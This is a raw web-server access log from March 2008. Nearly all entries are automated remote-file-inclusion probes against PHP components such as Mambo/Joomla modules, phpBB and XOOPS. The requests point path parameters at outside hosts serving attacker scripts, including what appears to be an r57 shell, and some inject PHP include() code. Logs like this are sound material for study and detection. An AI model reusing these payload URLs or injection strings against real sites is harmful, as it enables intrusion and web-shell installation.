217.172.174.208 - - [16/Mar/2008:07:14:17 -0700] "GET //mambots/administrator/components/com_swmenupro//components/com_mosmedia/index.php?path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:07:14:37 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:07:14:37 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [16/Mar/2008:07:14:49 -0700] "GET /logs/access_080215.log/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.72.9.25 - - [16/Mar/2008:07:15:06 -0700] "GET /logs/access_080207.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.160.81.126 - - [16/Mar/2008:07:15:22 -0700] "GET /logs/access_080225.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.172.57.15 - - [16/Mar/2008:07:15:58 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sigma.murcki.pl/mambots/editors/tinymce/jscripts/tinymce/idm.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.57.15 - - [16/Mar/2008:07:15:58 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sigma.murcki.pl/mambots/editors/tinymce/jscripts/tinymce/idm.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.48.162 - - [16/Mar/2008:07:16:03 -0700] "GET /logs/access_080215.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
72.32.199.201 - - [16/Mar/2008:07:16:05 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ehlcc.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
72.32.199.201 - - [16/Mar/2008:07:16:05 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ehlcc.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
218.189.141.154 - - [16/Mar/2008:07:17:13 -0700] "GET /logs/access_080207.log/config.php?path_to_root=http://yugifire.t35.com/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.70" "www.dmulk.com"
218.189.141.154 - - [16/Mar/2008:07:17:14 -0700] "GET /logs/config.php?path_to_root=http://yugifire.t35.com/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.70" "www.dmulk.com"
209.172.57.15 - - [16/Mar/2008:07:17:27 -0700] "GET /logs/access_080225.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sigma.murcki.pl/mambots/editors/tinymce/jscripts/tinymce/idm.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:07:18:16 -0700] "GET /logs/access_080118.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:07:18:16 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:07:18:16 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:07:18:19 -0700] "GET /logs/access_080118.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:07:18:19 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:07:18:19 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.169.168.26 - - [16/Mar/2008:07:18:33 -0700] "GET /index.php?option=com_login&task=§ionid=&id=&mosConfig_absolute_path=http://www.marthamaria-halle.de//cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
81.169.168.26 - - [16/Mar/2008:07:18:33 -0700] "GET /logs/index.php?option=com_login&task=§ionid=&id=&mosConfig_absolute_path=http://www.marthamaria-halle.de//cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
72.30.214.233 - - [16/Mar/2008:07:18:45 -0700] "GET /logs/access_080124.log HTTP/1.0" 200 713220 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.247.44.96 - - [16/Mar/2008:07:18:45 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.189.141.154 - - [16/Mar/2008:07:19:18 -0700] "GET /logs/access_080228.log/config.php?path_to_root=http://yugifire.t35.com/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.70" "www.dmulk.com"
218.150.160.162 - - [16/Mar/2008:07:19:41 -0700] "GET /logs/access.log/errors.php?error=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
158.75.35.9 - - [16/Mar/2008:07:20:05 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
158.75.35.9 - - [16/Mar/2008:07:20:05 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.247.44.96 - - [16/Mar/2008:07:20:34 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.169.134.186 - - [16/Mar/2008:07:20:48 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:07:21:01 -0700] "GET /logs/access.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:07:21:01 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:07:21:02 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.214.233 - - [16/Mar/2008:07:21:16 -0700] "GET /logs/access_080118.log HTTP/1.0" 200 561818 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:07:21:33 -0700] "GET /logs/access_080124.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.218.85.18 - - [16/Mar/2008:07:21:49 -0700] "GET /logs/access.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [16/Mar/2008:07:21:49 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [16/Mar/2008:07:21:50 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.95.222 - - [16/Mar/2008:07:22:17 -0700] "GET /logs/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://edu-web.eu/adds/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
70.87.63.234 - - [16/Mar/2008:07:23:16 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://sbuyzone.com/board/image/news.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.63.234 - - [16/Mar/2008:07:23:16 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://sbuyzone.com/board/image/news.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.63.234 - - [16/Mar/2008:07:23:16 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://sbuyzone.com/board/image/news.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.68.63.251 - - [16/Mar/2008:07:23:19 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.68.63.251 - - [16/Mar/2008:07:23:21 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.68.63.251 - - [16/Mar/2008:07:23:21 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.11 - - [16/Mar/2008:07:23:53 -0700] "GET /logs/access_080117.log//index.php?id=&lang=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.11 - - [16/Mar/2008:07:23:54 -0700] "GET //index.php?id=&lang=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.11 - - [16/Mar/2008:07:23:54 -0700] "GET /logs//index.php?id=&lang=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.7.194 - - [16/Mar/2008:07:24:07 -0700] "GET /logs/access_080117.log//index.php?id=&lang=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.7.194 - - [16/Mar/2008:07:24:09 -0700] "GET //index.php?id=&lang=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.7.194 - - [16/Mar/2008:07:24:10 -0700] "GET /logs//index.php?id=&lang=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:07:24:32 -0700] "GET /logs/access_080119.log//oneadmin/photogallery/include.php?path[docroot]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:07:24:32 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:07:24:33 -0700] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:07:24:37 -0700] "GET /logs/access_080225.log//oneadmin/photogallery/include.php?path[docroot]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.172.174.208 - - [16/Mar/2008:07:25:54 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.172.174.208 - - [16/Mar/2008:07:25:54 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
69.93.48.162 - - [16/Mar/2008:07:26:46 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:07:27:12 -0700] "GET /logs/access.log//oneadmin/photogallery/include.php?path[docroot]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:07:27:12 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:07:27:12 -0700] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [16/Mar/2008:07:27:18 -0700] "GET /logs/access_080122.log/modules/Neos_Chronos/header.php?base_folder=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [16/Mar/2008:07:27:18 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [16/Mar/2008:07:27:19 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:07:27:29 -0700] "GET /logs/access_071126.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:07:27:59 -0700] "GET /logs/access_080225.log//oneadmin/photogallery/include.php?path[docroot]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.235.74 - - [16/Mar/2008:07:28:15 -0700] "GET /logs/access_080124.log/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.235.74 - - [16/Mar/2008:07:28:15 -0700] "GET /logs/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.16 - - [16/Mar/2008:07:28:24 -0700] "GET //index.php?id=&lang=http://www.fansvictorvaldes.es///components/com_rwcards/alb.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.217.247.200 - - [16/Mar/2008:07:28:27 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://veldega-tour.ru/.log/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.217.247.200 - - [16/Mar/2008:07:28:27 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://veldega-tour.ru/.log/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.63.234 - - [16/Mar/2008:07:28:28 -0700] "GET /logs/access_080228.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://sbuyzone.com/board/image/news.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.235.74 - - [16/Mar/2008:07:29:39 -0700] "GET /logs/access_080215.log/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.216.95 - - [16/Mar/2008:07:30:02 -0700] "GET /logs/access_080211.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
124.217.247.200 - - [16/Mar/2008:07:30:47 -0700] "GET /logs/access_080225.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://veldega-tour.ru/.log/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:07:31:35 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.34.118.15 - - [16/Mar/2008:07:31:58 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.68.63.251 - - [16/Mar/2008:07:32:51 -0700] "GET /logs/access_080225.log/components/com_performs/performs.php?mosConfig_absolute_path=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.78.179 - - [16/Mar/2008:07:33:16 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://200.220.159.91/~regina/xpl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:07:34:00 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:07:34:09 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:07:34:09 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:07:34:09 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.96.133.55 - - [16/Mar/2008:07:34:16 -0700] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://2007.cultuurmarathon.nl/site/components/com_web/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
83.96.133.55 - - [16/Mar/2008:07:34:17 -0700] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://2007.cultuurmarathon.nl/site/components/com_web/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
87.230.78.179 - - [16/Mar/2008:07:34:17 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://200.220.159.91/~regina/xpl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.58.242.138 - - [16/Mar/2008:07:34:31 -0700] "GET /logs/access_080204.log/modules/Neos_Chronos/header.php?base_folder=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:07:34:37 -0700] "GET /logs/access_080129.log/main.php?pageURL=http://www.jef.at/vnc/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [16/Mar/2008:07:35:07 -0700] "GET /logs/access_071126.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.78.179 - - [16/Mar/2008:07:36:09 -0700] "GET /logs/access_080122.log/modules/Neos_Chronos/header.php?base_folder=http://200.220.159.91/~regina/xpl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.78.179 - - [16/Mar/2008:07:36:11 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://200.220.159.91/~regina/xpl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.78.179 - - [16/Mar/2008:07:36:11 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://200.220.159.91/~regina/xpl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.233.60.90 - - [16/Mar/2008:07:36:22 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://veldega-tour.ru/.log/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:07:37:05 -0700] "GET /logs/access_071229.log//login.php?dir=http://unisel.t35.com/r57i.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:07:37:05 -0700] "GET /logs//login.php?dir=http://unisel.t35.com/r57i.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:07:37:06 -0700] "GET /logs//login.php?dir=http://unisel.t35.com/r57i.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:07:37:12 -0700] "GET //login.php?dir=http://unisel.t35.com/r57i.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:07:37:12 -0700] "GET /logs//login.php?dir=http://unisel.t35.com/r57i.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:07:37:48 -0700] "GET /logs/access_080117.log//login.php?dir=http://unisel.t35.com/r57i.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.78.179 - - [16/Mar/2008:07:37:54 -0700] "GET /logs/access_080204.log/modules/Neos_Chronos/header.php?base_folder=http://200.220.159.91/~regina/xpl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.193.222.176 - - [16/Mar/2008:07:37:57 -0700] "GET /logs/access_080228.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [16/Mar/2008:07:37:57 -0700] "GET /logs/access_080228.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [16/Mar/2008:07:37:58 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [16/Mar/2008:07:37:58 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.34.118.15 - - [16/Mar/2008:07:37:59 -0700] "GET /logs/access_080228.log//modules/TotalCalendar/about.php?inc_dir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.34.118.15 - - [16/Mar/2008:07:37:59 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.86.80.16 - - [16/Mar/2008:07:38:11 -0700] "GET //mambots/administrator/components/com_swmenupro//components/com_mosmedia/index.php?path=http://www.aeromexicov.org/galeria/backups/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.34.118.15 - - [16/Mar/2008:07:38:13 -0700] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.56.111.194 - - [16/Mar/2008:07:38:32 -0700] "GET //index.php?id=&page=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.247.44.96 - - [16/Mar/2008:07:38:43 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.247.44.96 - - [16/Mar/2008:07:38:43 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
